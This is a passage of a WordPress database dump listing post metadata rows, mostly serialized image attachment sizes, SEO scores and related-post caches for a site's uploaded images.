(14009, 6044, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:679;s:6:\"height\";i:960;s:4:\"file\";s:21:\"2019/08/050862-09.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"050862-09-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"050862-09-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:21:\"050862-09-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(14010, 6043, '_thumbnail_id', '6044'),
(14014, 6043, '_hide_featured', NULL),
(14015, 6043, '_yoast_wpseo_content_score', '60'),
(14016, 6043, '_yoast_wpseo_primary_category', '31'),
(14017, 6043, '_wpas_done_all', '1'),
(14018, 6043, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575724758;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:4765;}i:1;a:1:{s:2:\"id\";i:4887;}i:2;a:1:{s:2:\"id\";i:4937;}}}}'),
(14019, 6046, '_edit_lock', '1568453226:14'),
(14020, 6047, '_wp_attached_file', '2019/08/050862-10.jpg'),
(14021, 6047, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:679;s:6:\"height\";i:960;s:4:\"file\";s:21:\"2019/08/050862-10.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"050862-10-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"050862-10-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:21:\"050862-10-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(14022, 6046, '_edit_last', '14'),
(14023, 6046, '_thumbnail_id', '6047'),
(14027, 6046, '_hide_featured', NULL),
(14028, 6046, '_yoast_wpseo_content_score', '60'),
(14029, 6046, '_yoast_wpseo_primary_category', '31'),
(14030, 6046, '_wpas_done_all', '1'),
(14035, 6040, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575194573;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:5936;}i:1;a:1:{s:2:\"id\";i:4098;}i:2;a:1:{s:2:\"id\";i:4166;}}}}'),
(14036, 6046, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575448271;s:7:\"payload\";a:0:{}}}'),
(14037, 6035, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575350035;s:7:\"payload\";a:0:{}}}'),
(14038, 6014, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575173557;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:5917;}i:1;a:1:{s:2:\"id\";i:6163;}i:2;a:1:{s:2:\"id\";i:5294;}}}}'),
(14039, 6017, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575671701;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:6020;}i:1;a:1:{s:2:\"id\";i:5762;}i:2;a:1:{s:2:\"id\";i:5769;}}}}'),
(14040, 6050, '_wp_attached_file', '2019/05/sirikit.jpg'),
(14041, 6050, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:800;s:6:\"height\";i:600;s:4:\"file\";s:19:\"2019/05/sirikit.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:19:\"sirikit-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:19:\"sirikit-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:19:\"sirikit-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:19:\"sirikit-400x300.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(14043, 6054, '_edit_lock', '1568453515:14'),
(14044, 6054, '_edit_last', '14'),
(14045, 6055, '_wp_attached_file', '2019/08/130862-01.png'),
(14046, 6055, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:824;s:4:\"file\";s:21:\"2019/08/130862-01.png\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"130862-01-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"130862-01-300x193.png\";s:5:\"width\";i:300;s:6:\"height\";i:193;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"130862-01-768x494.png\";s:5:\"width\";i:768;s:6:\"height\";i:494;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:22:\"130862-01-1024x659.png\";s:5:\"width\";i:1024;s:6:\"height\";i:659;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:21:\"130862-01-400x258.png\";s:5:\"width\";i:400;s:6:\"height\";i:258;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(14047, 6054, '_thumbnail_id', '6055'),
(14051, 6054, '_hide_featured', NULL),
(14052, 6054, '_yoast_wpseo_content_score', '30'),
(14053, 6054, '_yoast_wpseo_primary_category', '31'),
(14054, 6054, '_wpas_done_all', '1'),
(14057, 6057, '_edit_lock', '1568453696:14'),
(14058, 6057, '_edit_last', '14'),
(14059, 6058, '_wp_attached_file', '2019/08/130862-02.png'),
(14060, 6058, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:824;s:4:\"file\";s:21:\"2019/08/130862-02.png\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"130862-02-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"130862-02-300x193.png\";s:5:\"width\";i:300;s:6:\"height\";i:193;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"130862-02-768x494.png\";s:5:\"width\";i:768;s:6:\"height\";i:494;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:22:\"130862-02-1024x659.png\";s:5:\"width\";i:1024;s:6:\"height\";i:659;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:21:\"130862-02-400x258.png\";s:5:\"width\";i:400;s:6:\"height\";i:258;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(14061, 6057, '_thumbnail_id', '6058'),
(14065, 6057, '_hide_featured', NULL),
(14066, 6057, '_yoast_wpseo_content_score', '30'),
(14067, 6057, '_yoast_wpseo_primary_category', '31'),
(14068, 6057, '_wpas_done_all', '1'),
(14071, 6060, '_edit_lock', '1568453753:14'),
(14072, 6060, '_edit_last', '14'),
(14073, 6061, '_wp_attached_file', '2019/08/130862-03.png'),
(14074, 6061, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:824;s:4:\"file\";s:21:\"2019/08/130862-03.png\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"130862-03-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"130862-03-300x193.png\";s:5:\"width\";i:300;s:6:\"height\";i:193;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"130862-03-768x494.png\";s:5:\"width\";i:768;s:6:\"height\";i:494;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:22:\"130862-03-1024x659.png\";s:5:\"width\";i:1024;s:6:\"height\";i:659;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:21:\"130862-03-400x258.png\";s:5:\"width\";i:400;s:6:\"height\";i:258;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(14075, 6060, '_thumbnail_id', '6061'),
(14079, 6060, '_hide_featured', NULL),
(14080, 6060, '_yoast_wpseo_content_score', '30'),
(14081, 6060, '_yoast_wpseo_primary_category', '31'),
(14082, 6060, '_wpas_done_all', '1'),
(14085, 6063, '_edit_lock', '1568454535:14'),
(14086, 6064, '_wp_attached_file', '2019/08/130862-04.png'),
(14087, 6064, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:824;s:4:\"file\";s:21:\"2019/08/130862-04.png\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"130862-04-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"130862-04-300x193.png\";s:5:\"width\";i:300;s:6:\"height\";i:193;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"130862-04-768x494.png\";s:5:\"width\";i:768;s:6:\"height\";i:494;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:22:\"130862-04-1024x659.png\";s:5:\"width\";i:1024;s:6:\"height\";i:659;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:21:\"130862-04-400x258.png\";s:5:\"width\";i:400;s:6:\"height\";i:258;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(14088, 6063, '_edit_last', '14'),
(14089, 6063, '_thumbnail_id', '6064'),
(14093, 6063, '_hide_featured', NULL),
(14094, 6063, '_yoast_wpseo_content_score', '30'),
(14095, 6063, '_yoast_wpseo_primary_category', '31'),
(14096, 6063, '_wpas_done_all', '1'),
(14099, 6057, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575600140;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:6060;}i:1;a:1:{s:2:\"id\";i:5381;}i:2;a:1:{s:2:\"id\";i:5994;}}}}'),
(14100, 6063, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1574983802;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:5900;}i:1;a:1:{s:2:\"id\";i:6068;}i:2;a:1:{s:2:\"id\";i:6040;}}}}'),
(14101, 6060, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575546544;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:6037;}i:1;a:1:{s:2:\"id\";i:5671;}i:2;a:1:{s:2:\"id\";i:4107;}}}}'),
(14102, 6054, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575680605;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:4863;}i:1;a:1:{s:2:\"id\";i:5147;}i:2;a:1:{s:2:\"id\";i:6147;}}}}'),
(14104, 6068, '_edit_lock', '1566783178:14'),
(14105, 6068, '_edit_last', '14'),
(14106, 6069, '_wp_attached_file', '2019/08/260862-01.png'),
(14107, 6069, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:824;s:4:\"file\";s:21:\"2019/08/260862-01.png\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"260862-01-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"260862-01-300x193.png\";s:5:\"width\";i:300;s:6:\"height\";i:193;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"260862-01-768x494.png\";s:5:\"width\";i:768;s:6:\"height\";i:494;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:22:\"260862-01-1024x659.png\";s:5:\"width\";i:1024;s:6:\"height\";i:659;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:21:\"260862-01-400x258.png\";s:5:\"width\";i:400;s:6:\"height\";i:258;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(14108, 6068, '_thumbnail_id', '6069'),
(14112, 6068, '_hide_featured', NULL),
(14113, 6068, '_yoast_wpseo_content_score', '60'),
(14114, 6068, '_yoast_wpseo_primary_category', '31'),
(14115, 6068, '_wpas_done_all', '1'),
(14118, 6068, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575730594;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:4739;}i:1;a:1:{s:2:\"id\";i:4017;}i:2;a:1:{s:2:\"id\";i:5900;}}}}'),
(14119, 6071, '_edit_lock', '1566783164:14'),
(14120, 6072, '_wp_attached_file', '2019/08/260862-02.png'),
(14121, 6072, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:824;s:4:\"file\";s:21:\"2019/08/260862-02.png\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"260862-02-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"260862-02-300x193.png\";s:5:\"width\";i:300;s:6:\"height\";i:193;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"260862-02-768x494.png\";s:5:\"width\";i:768;s:6:\"height\";i:494;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:22:\"260862-02-1024x659.png\";s:5:\"width\";i:1024;s:6:\"height\";i:659;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:21:\"260862-02-400x258.png\";s:5:\"width\";i:400;s:6:\"height\";i:258;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(14122, 6071, '_edit_last', '14'),
(14123, 6071, '_thumbnail_id', '6072'),
(14127, 6071, '_hide_featured', NULL),
(14128, 6071, '_yoast_wpseo_content_score', '30'),
(14129, 6071, '_yoast_wpseo_primary_category', '31'),
(14130, 6071, '_wpas_done_all', '1'),
(14133, 6074, '_edit_lock', '1566783391:14'),
(14134, 6075, '_wp_attached_file', '2019/08/260862-03.png'),
(14135, 6075, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:824;s:4:\"file\";s:21:\"2019/08/260862-03.png\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"260862-03-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"260862-03-300x193.png\";s:5:\"width\";i:300;s:6:\"height\";i:193;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"260862-03-768x494.png\";s:5:\"width\";i:768;s:6:\"height\";i:494;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:22:\"260862-03-1024x659.png\";s:5:\"width\";i:1024;s:6:\"height\";i:659;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:21:\"260862-03-400x258.png\";s:5:\"width\";i:400;s:6:\"height\";i:258;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(14136, 6074, '_edit_last', '14'),
(14137, 6074, '_thumbnail_id', '6075'),
(14141, 6074, '_hide_featured', NULL),
(14142, 6074, '_yoast_wpseo_content_score', '30'),
(14143, 6074, '_yoast_wpseo_primary_category', '31'),
(14144, 6074, '_wpas_done_all', '1'),
(14147, 6078, '_edit_lock', '1566783377:14'),
(14148, 6079, '_wp_attached_file', '2019/08/260862-04.png'),
(14149, 6079, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:824;s:4:\"file\";s:21:\"2019/08/260862-04.png\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"260862-04-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"260862-04-300x193.png\";s:5:\"width\";i:300;s:6:\"height\";i:193;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"260862-04-768x494.png\";s:5:\"width\";i:768;s:6:\"height\";i:494;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:22:\"260862-04-1024x659.png\";s:5:\"width\";i:1024;s:6:\"height\";i:659;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:21:\"260862-04-400x258.png\";s:5:\"width\";i:400;s:6:\"height\";i:258;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(14150, 6078, '_edit_last', '14'),
(14151, 6078, '_thumbnail_id', '6079'),
(14155, 6078, '_hide_featured', NULL),
(14156, 6078, '_yoast_wpseo_content_score', '30'),
(14157, 6078, '_yoast_wpseo_primary_category', '31'),
(14158, 6078, '_wpas_done_all', '1'),
(14161, 6081, '_edit_lock', '1566783623:14'),
(14162, 6081, '_edit_last', '14'),
(14163, 6082, '_wp_attached_file', '2019/08/260862-05.png'),
(14164, 6082, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:824;s:4:\"file\";s:21:\"2019/08/260862-05.png\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"260862-05-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"260862-05-300x193.png\";s:5:\"width\";i:300;s:6:\"height\";i:193;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"260862-05-768x494.png\";s:5:\"width\";i:768;s:6:\"height\";i:494;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:22:\"260862-05-1024x659.png\";s:5:\"width\";i:1024;s:6:\"height\";i:659;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:21:\"260862-05-400x258.png\";s:5:\"width\";i:400;s:6:\"height\";i:258;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(14165, 6081, '_thumbnail_id', '6082'),
(14169, 6081, '_hide_featured', NULL),
(14170, 6081, '_yoast_wpseo_content_score', '30'),
(14171, 6081, '_yoast_wpseo_primary_category', '31'),
(14172, 6081, '_wpas_done_all', '1'),
(14177, 6085, '_edit_lock', '1566783584:14'),
(14178, 6086, '_wp_attached_file', '2019/08/260862-06.png'),
(14179, 6086, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:824;s:4:\"file\";s:21:\"2019/08/260862-06.png\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"260862-06-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"260862-06-300x193.png\";s:5:\"width\";i:300;s:6:\"height\";i:193;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"260862-06-768x494.png\";s:5:\"width\";i:768;s:6:\"height\";i:494;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:22:\"260862-06-1024x659.png\";s:5:\"width\";i:1024;s:6:\"height\";i:659;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:21:\"260862-06-400x258.png\";s:5:\"width\";i:400;s:6:\"height\";i:258;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(14180, 6085, '_edit_last', '14'),
(14181, 6085, '_thumbnail_id', '6086'),
(14185, 6085, '_hide_featured', NULL),
(14186, 6085, '_yoast_wpseo_content_score', '30'),
(14187, 6085, '_yoast_wpseo_primary_category', '31'),
(14188, 6085, '_wpas_done_all', '1'),
(14191, 6085, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575706196;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:4881;}i:1;a:1:{s:2:\"id\";i:4101;}i:2;a:1:{s:2:\"id\";i:4029;}}}}'),
(14192, 6071, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575184890;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:6332;}i:1;a:1:{s:2:\"id\";i:6081;}i:2;a:1:{s:2:\"id\";i:6063;}}}}'),
